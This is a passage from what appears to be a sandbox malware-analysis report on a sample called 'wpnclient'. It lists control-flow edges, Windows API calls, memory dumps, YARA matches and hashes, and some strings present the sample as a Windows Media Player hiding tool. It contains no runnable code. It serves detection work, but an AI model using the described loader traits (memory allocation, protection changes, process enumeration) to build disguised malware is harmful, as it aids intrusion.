919->924 925 590335-590337 919->925 920->906 920->912 926 59028b-59028f 921->926 927 590291-59029a 921->927 928 5901fb-590204 922->928 929 5901dd 922->929 936 590368-59036a 924->936 937 590351-590353 924->937 932 590339-59033e 925->932 933 590340-590343 925->933 926->927 934 59029c-5902a1 926->934 935 5902c3-5902c7 927->935 940 590207-59021c 928->940 929->928 930 5901df-5901f9 929->930 930->940 941 59044c 931->941 942 5903d0-5903d4 931->942 946 590345-59034b 932->946 933->946 947 5902a3-5902b2 934->947 948 5902b4-5902b7 934->948 935->921 943 5902c9-5902d1 935->943 944 59036c 936->944 945 590371-590376 936->945 938 590359-59035b 937->938 939 590355-590357 937->939 938->936 951 59035d-59035f 938->951 949 59036e-59036f 939->949 940->922 953 59021e 940->953 941->878 942->941 952 5903d6-5903e0 942->952 943->913 944->949 954 590379-590380 945->954 946->954 947->935 948->935 950 5902b9-5902bf 948->950 949->954 950->935 951->954 955 590361-590366 951->955 952->941 956 5903e2-5903e6 952->956 953->916 957 590388-59039d VirtualProtect 954->957 958 590382 954->958 955->954 956->941 959 5903e8-5903f9 956->959 957->875 960 5903a3 957->960 958->957 959->941 961 5903fb-590400 959->961 960->920 962 590402-59040f 961->962 962->962 963 590411-590415 962->963 964 59042d-590433 963->964 965 590417-590429 963->965 964->941 967 590435-59044b 964->967 965->961 966 59042b 965->966 966->941 967->941
                                                                                      APIs
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,00590005), ref: 005900E9
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00590005), ref: 00590111
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541675452.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_590000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocInfoNativeSystemVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2032221330-0
                                                                                      • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                      • Instruction ID: 2310e154d330a495706e16b0cc2f51a82d237a0ccb4a2f3a620a60fc160fb567
                                                                                      • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                      • Instruction Fuzzy Hash: 0FD1CD71A043068FDF24CF69C88476ABBE0FF94318F185D2DE9998B281E774E855CB91
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 021EA1A3
                                                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 021EA1A6
                                                                                      • lstrcmpiW.KERNELBASE(?,?,3A5A3511,?), ref: 021EA20B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFullImageNameQuerylstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3605714105-0
                                                                                      • Opcode ID: 358f814d937b2337a5bebd78a7107f062f15f7b213aad6b11331da322187ee5e
                                                                                      • Instruction ID: e0a6076f0960d60a6f037a9ef8338258941856e1af7ecf3cb59a15144f1c3f94
                                                                                      • Opcode Fuzzy Hash: 358f814d937b2337a5bebd78a7107f062f15f7b213aad6b11331da322187ee5e
                                                                                      • Instruction Fuzzy Hash: 26310574BC46408FDF38ABB8AC507AB66DAAF84350F01483EE547CF240EB74D8548B91
                                                                                      APIs
                                                                                      • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 021E9F91
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ChangeFindFirstNotification
                                                                                      • String ID: T$_?
                                                                                      • API String ID: 1065410024-3509241203
                                                                                      • Opcode ID: ff8032ed878188886a2121dab1906b709859e4f389478ad0b23358340293ffac
                                                                                      • Instruction ID: 2e6b5aafc4b7aaf13de8f580a36d6a5e15b6ba5fc19368e77df46a75b16d4af4
                                                                                      • Opcode Fuzzy Hash: ff8032ed878188886a2121dab1906b709859e4f389478ad0b23358340293ffac
                                                                                      • Instruction Fuzzy Hash: 1C4191707C4A408FDF18ABB8AD90A7F26D6AF95310B140C29E957CF281EB75D9508B92
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,38CFF007,021E6F11), ref: 021E747A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: 12
                                                                                      • API String ID: 1029625771-2589614596
                                                                                      • Opcode ID: 1ad25423882dc010084e7f280141ead48bd6ffb0784380b8838869c36cb3781b
                                                                                      • Instruction ID: 9e9306c1565348b13c1c78a6616432a0f72f184e126390338283a96e4afe53ee
                                                                                      • Opcode Fuzzy Hash: 1ad25423882dc010084e7f280141ead48bd6ffb0784380b8838869c36cb3781b
                                                                                      • Instruction Fuzzy Hash: 8C316664BC4D548AFD78A6A97C5073BD6879F80610F514C6AEA13CF3C5EB64C883C752
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,38CFF007,021E7540,?,38CFF007,021E6F11), ref: 021E7350
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: 12
                                                                                      • API String ID: 1029625771-2589614596
                                                                                      • Opcode ID: c0cef8acdd99ad3e317e805ecc7e7ea5e96709d6580bb3d513d588c96f38da49
                                                                                      • Instruction ID: ad10185616009c3541c276a62799f42d068aff3b0c95dbf8079c0423fd9a3f58
                                                                                      • Opcode Fuzzy Hash: c0cef8acdd99ad3e317e805ecc7e7ea5e96709d6580bb3d513d588c96f38da49
                                                                                      • Instruction Fuzzy Hash: A9014F74BC46018FDF54ABB9BC50B6B6ADA9FC1210304487CA916CF381EB35D8918F91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541930678.0000000002181000.00000020.00001000.00020000.00000000.sdmp, Offset: 02181000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2181000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 484c103867eddf166a79845ba69795374893d8e4885a3ecd88cf553068bb42f1
                                                                                      • Instruction ID: 34ed492a715408222c1e38e69abfd34f64f27586ec9e0dbf5c74c86c20e99a93
                                                                                      • Opcode Fuzzy Hash: 484c103867eddf166a79845ba69795374893d8e4885a3ecd88cf553068bb42f1
                                                                                      • Instruction Fuzzy Hash: 5F41E576A40109AFDB04DF44C4D4BAAB7B2FB88314F24C699E8195B355D772EA82CF80
                                                                                      APIs
                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 021E58F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InformationVolume
                                                                                      • String ID:
                                                                                      • API String ID: 2039140958-0
                                                                                      • Opcode ID: d6dde5df1d0d7b5f76248fd510682528fff49ff91e85ae5f9bc5c9de0dca50c8
                                                                                      • Instruction ID: 4586b621a931d6864eff8072432522ce2b435270daacb3bbdc701b437bbd1ac3
                                                                                      • Opcode Fuzzy Hash: d6dde5df1d0d7b5f76248fd510682528fff49ff91e85ae5f9bc5c9de0dca50c8
                                                                                      • Instruction Fuzzy Hash: D4117070A80700ABEB24DBA5DC41F6A77E6BF94704F84482CA5568F1C0EBB4D584CB52
                                                                                      APIs
                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 021E5044
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 021E50F4
                                                                                      • CloseHandle.KERNELBASE(?,?,?,?), ref: 021E512C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 1083639309-0
                                                                                      • Opcode ID: c10f97560d84e4cdf419f1fb7d3b450cc9ffa29c5b594d7b4b1f49212bb162d9
                                                                                      • Instruction ID: 8fd64805afd140311edd7002b1512332f6b8f9a0a2c8290dbd8c2f2aef1c0292
                                                                                      • Opcode Fuzzy Hash: c10f97560d84e4cdf419f1fb7d3b450cc9ffa29c5b594d7b4b1f49212bb162d9
                                                                                      • Instruction Fuzzy Hash: 3FF0E5716D0D416E8E385A7C9C4573F26969BA120CF9C4D2AE113CA244EB25C5804BD3
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541930678.0000000002181000.00000020.00001000.00020000.00000000.sdmp, Offset: 02181000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2181000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 061a936fa3d45b50554c797a4fa40612d35db7f8d1273f73d040243af2e83836
                                                                                      • Instruction ID: b19573b7d9535dd06d3f886f09eb078d8e5a53960b6b468e8fb61b8895a6860b
                                                                                      • Opcode Fuzzy Hash: 061a936fa3d45b50554c797a4fa40612d35db7f8d1273f73d040243af2e83836
                                                                                      • Instruction Fuzzy Hash: 28D09EB5D80208BFD744EFA4DD8AA9EBBB5EB04702F508165E9156B240F7B06B148F92
                                                                                      APIs
                                                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 0218182F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541930678.0000000002181000.00000020.00001000.00020000.00000000.sdmp, Offset: 02181000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2181000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: 179d62c6664bd134bad8de311bd4d8ba7f1022aaa7819590173fbb40ed012723
                                                                                      • Instruction ID: b37f910df6b560927f97fa153fec11c0b96d9db2365c6ba30fc8e931abfcdbeb
                                                                                      • Opcode Fuzzy Hash: 179d62c6664bd134bad8de311bd4d8ba7f1022aaa7819590173fbb40ed012723
                                                                                      • Instruction Fuzzy Hash: 8DC04C7A55420CAB8B04DF98EC94DAB77EDBB8CA10B148548FA1D87200C630F9508BA4
                                                                                      APIs
                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401D96
                                                                                        • Part of subcall function 00401F90: FindWindowA.USER32(WMPlayerApp,00000000), ref: 00401F97
                                                                                      • DestroyWindow.USER32(?), ref: 00401D9D
                                                                                      • GetSystemMenu.USER32(?,00000000), ref: 00401DA8
                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00401DC0
                                                                                      • AppendMenuA.USER32(00000000,00000000,00000005,About...), ref: 00401DCC
                                                                                      • CreateWindowExA.USER32(00000000,Button,&Show Window,50000000,00000005,00000005,0000007D,00000019,?,00000002,00000000,00000000), ref: 00401DF8
                                                                                      • CreateWindowExA.USER32(00000000,Button,&Hide Window,50000000,00000087,00000005,0000007D,00000019,?,00000003,00000000,00000000), ref: 00401E27
                                                                                      • CreateWindowExA.USER32(00000000,Edit,Windows Media Player,50800000,0000000F,0000002D,000000EB,00000019,?,00000001,00000000,00000000), ref: 00401E56
                                                                                      • CreateWindowExA.USER32(00000000,Button,&Change Caption,50000000,00000048,0000004E,0000007D,00000019,?,00000004,00000000,00000000), ref: 00401E81
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFB
                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00401F0D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541432357.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2541409691.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541456929.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Create$Menu$Append$DestroyFindMessagePostProcQuitShowSystem
                                                                                      • String ID: &Change Caption$&Hide Window$&Show Window$About...$Button$Edit$Windows Media Player
                                                                                      • API String ID: 1675743168-3498740803
                                                                                      • Opcode ID: 6fa5b30cb9d90c5671a906c00b49d1a349abe0e32d26c551bf39c42dfad87899
                                                                                      • Instruction ID: d2c89a25cf38dd3cc98bce7da6c1abaab37f22b51a640bf9a67e858da95faab1
                                                                                      • Opcode Fuzzy Hash: 6fa5b30cb9d90c5671a906c00b49d1a349abe0e32d26c551bf39c42dfad87899
                                                                                      • Instruction Fuzzy Hash: 43416271384705BBF630A7649D4AF6B3698EB44F15F204437F701BA2E1D6F9A8408BAD
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541432357.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2541409691.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541456929.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                      • String ID:
                                                                                      • API String ID: 801014965-0
                                                                                      • Opcode ID: 6ec102433b06512b8c0474839b6dd368cc5f6bc9c2e1b5937cc38a74b614f200
                                                                                      • Instruction ID: 87e11df5f4ae46379268185e5a3862cdd04542f6cf5212e8f2ca647c65b29d7f
                                                                                      • Opcode Fuzzy Hash: 6ec102433b06512b8c0474839b6dd368cc5f6bc9c2e1b5937cc38a74b614f200
                                                                                      • Instruction Fuzzy Hash: EB415DB19016449FDB249FA4DE49AAA7BB8FB09710F20017FE952B72E1C7B84940CF58
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 021EA5D9
                                                                                      • GetCurrentProcess.KERNEL32(00000000), ref: 021EA5DC
                                                                                      • GetCurrentProcess.KERNEL32(00000000), ref: 021EA5DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: p^sw$12$12$12$12
                                                                                      • API String ID: 2050909247-1227802654
                                                                                      • Opcode ID: ac3f5c88cd0e0bbe0305cf6bf66e12e0b839a3c5f3bc9f8abbeaf48883918b5d
                                                                                      • Instruction ID: 9220c7fc66ba15ca7dce2e57800561afaf511b81bf22d02aed6eaee060359692
                                                                                      • Opcode Fuzzy Hash: ac3f5c88cd0e0bbe0305cf6bf66e12e0b839a3c5f3bc9f8abbeaf48883918b5d
                                                                                      • Instruction Fuzzy Hash: 2CB1C070BC46018FCE24EBA8AC90A2B7BD6AFC4654F044D2DE947DB341EB34D9518BD2
                                                                                      APIs
                                                                                      • SetLastError.KERNEL32(0000007F), ref: 021814DB
                                                                                      • SetLastError.KERNEL32(0000007F), ref: 02181507
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541930678.0000000002181000.00000020.00001000.00020000.00000000.sdmp, Offset: 02181000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2181000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1452528299-0
                                                                                      • Opcode ID: 10e013deadb1f9bf229c52a74ed6805df9d322b444bd7aee096c7110de159fa8
                                                                                      • Instruction ID: 1f06810acf53ee7713a07b26d6f219a288d0baa56d80d311e4d58cc4a66f70dd
                                                                                      • Opcode Fuzzy Hash: 10e013deadb1f9bf229c52a74ed6805df9d322b444bd7aee096c7110de159fa8
                                                                                      • Instruction Fuzzy Hash: 3671D775E40109EFDB08DF94C590BAEB7B2FF48304F648598D55AAB341D774AA82CF90
                                                                                      APIs
                                                                                      • ProcessIdToSessionId.KERNEL32(00000000), ref: 021EAD50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ProcessSession
                                                                                      • String ID: bn|4$bn|4$p^sw$12$12
                                                                                      • API String ID: 3779259828-1273418396
                                                                                      • Opcode ID: b4aa0881f1347cbe60282b7e36c94e1c7871bca9b886dc5a543c50211976a485
                                                                                      • Instruction ID: 5ada94302d9e551c9bb03677ce4495d87aa753c486fcbf82d39205023b9939ca
                                                                                      • Opcode Fuzzy Hash: b4aa0881f1347cbe60282b7e36c94e1c7871bca9b886dc5a543c50211976a485
                                                                                      • Instruction Fuzzy Hash: AF91CD74BC46048FCF14EBB8AC90B2F7BD6AF84610B540D29E856CF241EB35DD588B92
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?), ref: 0040108C
                                                                                      • DestroyWindow.USER32(?), ref: 0040109C
                                                                                      • SetDlgItemTextA.USER32(?,000003E8,This program was created in using pure Win32 API (in C++). The purpose of this program is to save both screen memory and taskbar space by hiding the Windows Media Player Window.), ref: 004010B6
                                                                                      • DestroyWindow.USER32(?), ref: 004010E0
                                                                                      Strings
                                                                                      • This program was created in using pure Win32 API (in C++). The purpose of this program is to save both screen memory and taskbar space by hiding the Windows Media Player Window., xrefs: 004010AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541432357.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2541409691.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541456929.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyWindow$ItemText
                                                                                      • String ID: This program was created in using pure Win32 API (in C++). The purpose of this program is to save both screen memory and taskbar space by hiding the Windows Media Player Window.
                                                                                      • API String ID: 396529852-1331625695
                                                                                      • Opcode ID: a61dc5f83ef90b811d585fcc311af718773135b45cb18a34e47a048bdf587a9a
                                                                                      • Instruction ID: b100099e501738790042682215e8a6d7cad033c4a8bb43f03221d718276c4884
                                                                                      • Opcode Fuzzy Hash: a61dc5f83ef90b811d585fcc311af718773135b45cb18a34e47a048bdf587a9a
                                                                                      • Instruction Fuzzy Hash: 0DF0AF322142406FC7148B70DA8C92B72D4EBA9701F41CC3AF182E6AE4D73DCC90EB59
                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02182468
                                                                                      • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 021824B2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541930678.0000000002181000.00000020.00001000.00020000.00000000.sdmp, Offset: 02181000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2181000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID: @
                                                                                      • API String ID: 544645111-2766056989
                                                                                      • Opcode ID: b903d8a8424009bf0318f3dcf00d0873bf5c09273585d8d45b1b7f959a0b44c3
                                                                                      • Instruction ID: 6510afc0883a7d2b6d6adec1fa208311483ff8cbb217acceb798b85c76c748fe
                                                                                      • Opcode Fuzzy Hash: b903d8a8424009bf0318f3dcf00d0873bf5c09273585d8d45b1b7f959a0b44c3
                                                                                      • Instruction Fuzzy Hash: 0021F5B4E44248EFDB05DF98C8C0BADBBB5BF44304F208589D916AB240C374AA80DF61
                                                                                      APIs
                                                                                      • GetModuleHandleExA.KERNEL32(00000000,kernel32.dll), ref: 004015A3
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00000000,kernel32.dll), ref: 004015BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541432357.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2541409691.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541456929.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHandleModuleVirtual
                                                                                      • String ID: kernel32.dll
                                                                                      • API String ID: 2270936652-1793498882
                                                                                      • Opcode ID: 5bf35002c93f4facc3e081f7e865f0f685930981354593ef6d5b8ce1566f61f9
                                                                                      • Instruction ID: bb32f66759e984ad9a82917001f02bd0d3e76ee526862dde03f538f9ec23572d
                                                                                      • Opcode Fuzzy Hash: 5bf35002c93f4facc3e081f7e865f0f685930981354593ef6d5b8ce1566f61f9
                                                                                      • Instruction Fuzzy Hash: BCF0A77230132427C614DA555C05BAF6699FBC4B61F14043EFA07F72C0CB749904D3A9
                                                                                      APIs
                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 021821F9
                                                                                      • SetLastError.KERNEL32(0000007E), ref: 0218223B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541930678.0000000002181000.00000020.00001000.00020000.00000000.sdmp, Offset: 02181000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2181000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 4100373531-0
                                                                                      • Opcode ID: f0adc8521f86814f0ca6d638a525b9028a966fe21119df7ca3b3d049a29904ae
                                                                                      • Instruction ID: 6f267b3e90a8f3ee02276ead7f0d299c1eb63409e3b209ec8c0dc0498b4be083
                                                                                      • Opcode Fuzzy Hash: f0adc8521f86814f0ca6d638a525b9028a966fe21119df7ca3b3d049a29904ae
                                                                                      • Instruction Fuzzy Hash: 6D81BA74A40249EFDB08DF94C994BAEB7B1FF48314F248198E919AB351C734EA81CF91